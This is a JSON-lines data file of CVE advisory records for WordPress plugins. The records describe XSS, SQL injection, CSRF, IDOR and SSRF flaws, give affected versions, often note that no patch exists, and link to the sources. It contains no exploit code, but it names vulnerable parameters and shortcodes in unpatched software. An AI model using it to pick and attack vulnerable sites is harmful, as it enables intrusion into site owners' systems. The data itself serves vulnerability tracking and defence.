{"CVE_ID":"CVE-2024-13055","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91178272-ed7e-412c-a187-e360a1313004\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4220","slug":"xavins-list-subpages","versionImpact":"1.3","description":"The Xavin&#039;s List Subpages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xls' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-list-subpages\\\/trunk\\\/xavins-list-subpages.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-list-subpages\\\/trunk\\\/xavins-list-subpages.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df30f21a-cd3a-4391-9f59-81538fefabdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df30f21a-cd3a-4391-9f59-81538fefabdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7088","slug":"add-svg-support-for-media-uploader-inventivo","versionImpact":"1.0.5","description":"The Add SVG Support for Media Uploader | inventivo WordPress plugin through 1.0.5 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f515e36-9072-4fc4-9d2f-d50f1adde626\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f515e36-9072-4fc4-9d2f-d50f1adde626\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5816","slug":"biteship","versionImpact":"3.2.0","description":"The Plugin Pengiriman WooCommerce Kurir Reguler, Instan, Kargo \u2013 Biteship plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.2.0 via the get_order_detail() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's orders.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/includes\\\/class-biteship.php#L515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/includes\\\/class-biteship.php#L515\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/public\\\/class-biteship-public.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/biteship\\\/trunk\\\/public\\\/class-biteship-public.php#L327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48509d43-57bb-452c-b39b-905354a273f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48509d43-57bb-452c-b39b-905354a273f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7670","slug":"jquery-archive-list-widget","versionImpact":"6.1.5","description":"The JS Archive List plugin for WordPress is vulnerable to time-based SQL Injection via the build_sql_where() function in all versions up to, and including, 6.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Skatox\\\/jquery-archive-list\\\/commit\\\/1c4a5749b187cc65d2c4b192b9c9890a36bf1fd2\",\"name\":\"https:\\\/\\\/github.com\\\/Skatox\\\/jquery-archive-list\\\/commit\\\/1c4a5749b187cc65d2c4b192b9c9890a36bf1fd2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-archive-list-widget\\\/tags\\\/6.1.5\\\/classes\\\/class-jq-archive-list-datasource.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-archive-list-widget\\\/tags\\\/6.1.5\\\/classes\\\/class-jq-archive-list-datasource.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341291\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341291\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-archive-list-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-archive-list-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72857d52-ac81-4eb2-93fa-7bb03265bccf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72857d52-ac81-4eb2-93fa-7bb03265bccf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4834","slug":"cpt-bootstrap-carousel","versionImpact":"1.12","description":"The CPT Bootstrap Carousel WordPress plugin through 1.12 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6183318f-0230-47a1-87f2-3c5aaef678a5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6183318f-0230-47a1-87f2-3c5aaef678a5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1408","slug":"video-list-manager","versionImpact":"1.7","description":"The Video List Manager WordPress plugin through 1.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2029","slug":"prepost-seo","versionImpact":"3.0","description":"The PrePost SEO WordPress plugin through 3.0 does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4889ad5a-c8c4-4958-b176-64560490497b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4889ad5a-c8c4-4958-b176-64560490497b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5940","slug":"wp-not-login-hide-wpnlh","versionImpact":"1.0","description":"The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d594c00d-2905-449b-80cd-95965a96cd4b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d594c00d-2905-449b-80cd-95965a96cd4b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1081","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.3","description":"The 3D FlipBook \u2013 PDF Flipbook WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bookmark feature in all versions up to, and including, 1.15.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5021","slug":"nimble-portfolio","versionImpact":"3.0.1","description":"The WordPress Picture \/ Portfolio \/ Media Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.0.1 via the 'file_get_contents' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/224a2d6d-7fdc-43a8-a8c9-26213b604433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/224a2d6d-7fdc-43a8-a8c9-26213b604433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nimble-portfolio\\\/trunk\\\/includes\\\/prettyphoto\\\/download-image.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nimble-portfolio\\\/trunk\\\/includes\\\/prettyphoto\\\/download-image.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23887","slug":"easy-google-analytics-for-wordpress","versionImpact":"1.6.0","description":"Missing Authorization vulnerability in Shaon Easy Google Analytics for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Google Analytics for WordPress: from n\/a through 1.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-google-analytics-for-wordpress\\\/vulnerability\\\/wordpress-easy-google-analytics-for-wordpress-plugin-1-6-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-google-analytics-for-wordpress\\\/vulnerability\\\/wordpress-easy-google-analytics-for-wordpress-plugin-1-6-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12819","slug":"searchie","versionImpact":"1.17.0","description":"The Searchie plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sio_embed_media' shortcode in all versions up to, and including, 1.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchie\\\/trunk\\\/SIO\\\/Shortcodes\\\/WidgetsEmbed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchie\\\/trunk\\\/SIO\\\/Shortcodes\\\/WidgetsEmbed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchie\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchie\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8abed8c7-0c3f-4054-a116-82ce47d605de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8abed8c7-0c3f-4054-a116-82ce47d605de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13052","slug":"dental-optimizer-patient-generator-app","versionImpact":"1.0","description":"The Dental Optimizer Patient Generator App WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/671d5eef-c496-4047-9d01-8ab8a94cdc72\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4055","slug":"multiple-post-type-order","versionImpact":"1.10.0","description":"The Multiple Post Type Order plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mpto' shortcode in all versions up to, and including, 1.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multiple-post-type-order\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multiple-post-type-order\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b148926d-090d-4fab-991c-89105078a263?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b148926d-090d-4fab-991c-89105078a263?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7086","slug":"svg-uploads-support","versionImpact":"2.1.1","description":"The SVG Uploads Support WordPress plugin through 2.1.1 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94954e1a-dc09-4811-b57d-b12bf69a767d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94954e1a-dc09-4811-b57d-b12bf69a767d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1263","slug":"cmp-coming-soon-maintenance","versionImpact":"4.1.6","description":"The CMP \u2013 Coming Soon & Maintenance plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 4.1.6 via the cmp_get_post_detail function. This can allow unauthenticated individuals to obtain the contents of any non-password-protected, published post or page even when maintenance mode is enabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e01b4259-ed8d-44a4-9771-470de45b14a8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e01b4259-ed8d-44a4-9771-470de45b14a8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L2759\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L2759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5315","slug":"wp-gmappity-easy-google-maps","versionImpact":"0.6","description":"The Google Maps made Simple plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gmappity-easy-google-maps\\\/tags\\\/0.6\\\/wpgmappity-metadata.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gmappity-easy-google-maps\\\/tags\\\/0.6\\\/wpgmappity-metadata.php#L127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262db9aa-0db5-48cd-a85b-3e6302e88a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262db9aa-0db5-48cd-a85b-3e6302e88a42?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2000","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee517de-a47e-47c9-8322-92ce772191b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee517de-a47e-47c9-8322-92ce772191b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3824","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/749ae334-b1d1-421e-a04c-35464c961a4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/749ae334-b1d1-421e-a04c-35464c961a4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4873","slug":"replace-image","versionImpact":"1.1.10","description":"The Replace Image plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.10 via the image replacement functionality due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to replace images uploaded by higher level users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d3a62-f7e5-4776-bed9-7ff3f81da452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d3a62-f7e5-4776-bed9-7ff3f81da452?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/replace-image\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/replace-image\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-45270","slug":"carousel-slider","description":"WordPress plugin \"Carousel Slider\" provided by Sayful Islam contains a cross-site request forgery vulnerability on Hero image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"name\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8861","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.3.2","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.9.3.2 due to incorrect use of the wp_kses_allowed_html function, which allows the 'onclick' attribute for certain HTML elements without sufficient restriction or context validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3188c2-e5b0-4d83-8c92-ae6b409c92f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3188c2-e5b0-4d83-8c92-ae6b409c92f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/includes\\\/class-profile-magic.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/includes\\\/class-profile-magic.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profilegrid-user-profiles-groups-and-communities\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profilegrid-user-profiles-groups-and-communities\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2065\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2065\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157510\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157510\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11381","slug":"control-horas","versionImpact":"1.0.1","description":"The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-horas\\\/trunk\\\/includes\\\/class-fichaje.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-horas\\\/trunk\\\/includes\\\/class-fichaje.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aeafeec-7202-4ee6-b724-8dcf98591294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aeafeec-7202-4ee6-b724-8dcf98591294?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12774","slug":"altra-side-menu","versionImpact":"2.0","description":"The Altra Side Menu WordPress plugin through 2.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete arbitrary menu via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8decbef5-f106-488b-925c-42b3b280460a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8decbef5-f106-488b-925c-42b3b280460a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0692","slug":"simple-video-management-system","versionImpact":"1.0.4","description":"The Simple Video Management System WordPress plugin through 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/176f329b-a861-4ab0-ad1d-02f750f9b691\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/176f329b-a861-4ab0-ad1d-02f750f9b691\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1346","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the clear_page_cache function. This makes it possible for unauthenticated attackers to clear the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b228f8b1-dd68-41ee-bc49-6a62e5267233\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b228f8b1-dd68-41ee-bc49-6a62e5267233\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
